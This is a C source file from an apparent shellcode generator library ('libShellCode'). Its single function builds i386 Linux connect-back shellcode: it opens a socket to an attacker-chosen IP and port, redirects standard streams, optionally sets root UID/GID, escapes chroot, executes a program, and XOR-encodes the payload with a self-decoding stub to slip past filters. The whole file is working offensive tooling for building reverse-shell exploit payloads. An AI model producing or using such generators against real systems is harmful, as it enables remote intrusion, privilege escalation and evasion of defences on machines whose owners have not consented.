/*
 *     __   ___   _
 *    /  \ |   \ | | /\---------<ShellCode Generator Library>----------------->
 *   / /\ \| |\ \| |/ /
 *  / /__\ \    /|   /          libShellCode is an ORK's project!
 *  \______/ |\ \| | \          For comments, bug reports, etc ...
 *<--------|_| \_\_|\_\         contact me at orkmail<at>katamail<dot>com
 *
 *
 */


#include "codes.h"
#include "i386_codes.h"
#include "i386_linux_codes.h"


/*
 * Function:    generate_i386_linux_connect_back_SC()
 * Parameters:  char * prg      the path of the command to execute with the 
 *                              command line parameters
 *              int  setuid     0 = none
 *                              1 = execute setuid(0)
 *                              2 = execute setreuid(0, 0)
 *                              3 = execute setresuid(0, 0, 0)
 *              int  setgid     0 = none
 *                              1 = execute setgid(0)
 *                              2 = execute setregid(0, 0)
 *                              3 = execute setresgid(0, 0, 0)
 *              int chroot_evasion 0 = none
 *                              1 = evade chroot() before execve()
 *              int exit        0 = don't execute exit(0) 
 *                              1 = execute exit(0) after execve()
 *              char *ip        the IP address where connect
 *              int port        port to connect
 *              int  cripted    0 = not encripted
 *                              1 = XOR Encription
 * Return:      char *          the pointer to the ShellCode generated
 * Description: This function generates a ShellCode that connect to an IP:Port
 *              and execute a program.
 * Note:        Inspired by a bighawk code.
 *
 */

char *generate_i386_linux_connect_back_SC(char *prg, int setuid, int setgid, int chroot_evasion, int exit, char *ip, int port, int cripted)
{
  int lenprog, nextptr;
  char *p, *oldp, network[128], pre_pop[64], after_pop[400], parm[128], xor_code[64], *shellcode, *prog;
  unsigned long ipnum;
  unsigned char xor_byte;

  // Initialize x86 Linux codes
  initialize_codes(I386, LINUX);

  prog = (char *) strdup(prg);

  // Network 
  sprintf(network, "%s", SOCKET);

  p = (char *) &port;

  if (port < 255)
    {
      MOV_IN_CH[1] = p[0];
      sprintf(network, "%s%s%s", network, XOR_ECX_ECX, MOV_IN_CH);
    }
  else
    {
      MOV_IN_CX[2] = p[1];
      MOV_IN_CX[3] = p[0];
      sprintf(network, "%s%s%s", network, XOR_ECX_ECX, MOV_IN_CX);
    }

  ipnum = ntohl(inet_addr(ip));
  p = (char *) &ipnum;

  CONNECT[1] = p[3];
  CONNECT[2] = p[2]; 
  CONNECT[3] = p[1]; 
  CONNECT[4] = p[0];   

  sprintf(network, "%s%s", network, CONNECT);

  sprintf(network, "%s%s%s", network, MOV_EDI_EBX, DUP2);

  // setuid
  after_pop[0]=0;
  switch(setuid)
    {
    case 1:
      sprintf(after_pop, "%s%s\0", after_pop, SETUID_0);
      break;
    case 2:
      sprintf(after_pop, "%s%s\0", after_pop, SETREUID_0_0);
      break;
    case 3:
      sprintf(after_pop, "%s%s\0", after_pop, SETRESUID_0_0_0);
      break;
    }

  // setgid
  switch(setgid)
    {
    case 1:
      sprintf(after_pop, "%s%s\0", after_pop, SETGID_0);
      break;
    case 2:
      sprintf(after_pop, "%s%s\0", after_pop, SETREGID_0_0);
      break;
    case 3:
      sprintf(after_pop, "%s%s\0", after_pop, SETRESGID_0_0_0);
      break;
    }

  // chroot evasion
  if(chroot_evasion == 1)
    {
      sprintf(after_pop, "%s%s\0", after_pop, CHROOT_EVASION);
    }

  // Execve
  pre_pop[0]=0;
  lenprog = strlen(prog);
  nextptr = lenprog + 1;
  MOV_ESI_nESI[2] = (char) (nextptr);
  MOV_AL_nESI[2] = (char) lenprog;
  nextptr += 4;
  sprintf(after_pop, "%s%s%s%s\0", after_pop, XOR_EAX_EAX, MOV_AL_nESI, MOV_ESI_nESI);

  parm[0] = '\0';
  oldp = prog;
  while(p=strchr(oldp, ' '))
    {
      MOV_AL_nESI[2] = (char) (p - prog);
      ADD_BL[2] = (char) (p - oldp + 1);
      MOV_EBX_nESI[2] = (char) (nextptr);
      sprintf(parm, "%s%s%s%s\0", parm, MOV_AL_nESI, ADD_BL, MOV_EBX_nESI);
      nextptr += 4;
      oldp=++p;
    }

  if(strlen(parm)!=0)
    {
      sprintf(after_pop, "%s%s%s\0", after_pop, MOV_ESI_EBX, parm);
    }
  
  MOV_EAX_nESI[2] = (char) (nextptr);
  MOV_IN_AL[1] = 0xb;
  LEA_nESI_ECX[2] = (char) (lenprog+1);
  LEA_nESI_EDX[2] = (char) (nextptr);

  sprintf(after_pop, "%s%s%s\0", after_pop, MOV_EAX_nESI, MOV_IN_AL);
  sprintf(after_pop, "%s%s%s\0", after_pop, MOV_ESI_EBX, LEA_nESI_ECX);
  sprintf(after_pop, "%s%s%s\0", after_pop, LEA_nESI_EDX, INT_80);

  // Exit
  if (exit == 1) sprintf(after_pop, "%s%s\0", after_pop, EXIT_0);

  // XOR Encription
  xor_code[0]=0;
  if (cripted == 1)
    {
      xor_byte = char_rnd_gen();
      while((xor_check(after_pop, xor_byte) || xor_check(prog, xor_byte) || xor_check(network, xor_byte)))
	{
	  xor_byte = char_rnd_gen();
	}

      cript(after_pop, xor_byte); 
      cript(prog, xor_byte); 
      cript(network, xor_byte); 

      MOV_IN_AL[1] = xor_byte;
      MOV_IN_CL[1] = (char) (strlen(after_pop) + strlen(network));
      LOOP[1] = 0xfb;
      
      sprintf(xor_code, "%s%s%s", XOR_ECX_ECX, MOV_IN_AL, MOV_ESI_EBX);
      sprintf(xor_code, "%s%s%s", xor_code, MOV_IN_CL, ADD_ECX_ESI);

      MOV_IN_CL[1] = (char) (strlen(after_pop) + strlen(network) + strlen(prog));
      sprintf(xor_code, "%s%s", xor_code, MOV_IN_CL);

      sprintf(xor_code, "%s%s%s", xor_code, XOR_AL_EBX, INC_EBX);

      JMP[1] = 5;  
      sprintf(xor_code, "%s%s%s", xor_code, LOOP, JMP); 
  
      JMP[1] = (strlen(xor_code) + 1);
      sprintf(pre_pop, "%s%s%s\0", pre_pop, JMP, POP_ESI);
      
      CALLPOP[1] = (char) (0xFF - (strlen(xor_code) + 4 + 1));
      sprintf(xor_code, "%s%s\0", xor_code, CALLPOP);
      
      shellcode = (char *) malloc(strlen(network)+strlen(pre_pop)+strlen(after_pop)+strlen(prog)+strlen(xor_code) + 1);
      sprintf(shellcode, "%s%s%s%s%s\0", pre_pop, xor_code, network, after_pop, prog);
    }
  else
    {
      JMP[1] = (char) (strlen(after_pop) + strlen(xor_code) + 1);
      CALLPOP[1] = (char) (0xFF - (strlen(after_pop) + strlen(xor_code) + 4 + 1));

      sprintf(pre_pop, "%s%s%s\0", pre_pop, JMP, POP_ESI);
      sprintf(after_pop, "%s%s\0", after_pop, CALLPOP);
      
      shellcode = (char *) malloc(strlen(network)+strlen(pre_pop)+strlen(after_pop)+strlen(prog)+strlen(xor_code) + 1);
      sprintf(shellcode, "%s%s%s%s%s\0", network, pre_pop, xor_code, after_pop, prog);
    }
  
  free(prog);
  free_codes(I386, LINUX);
  return shellcode;
}
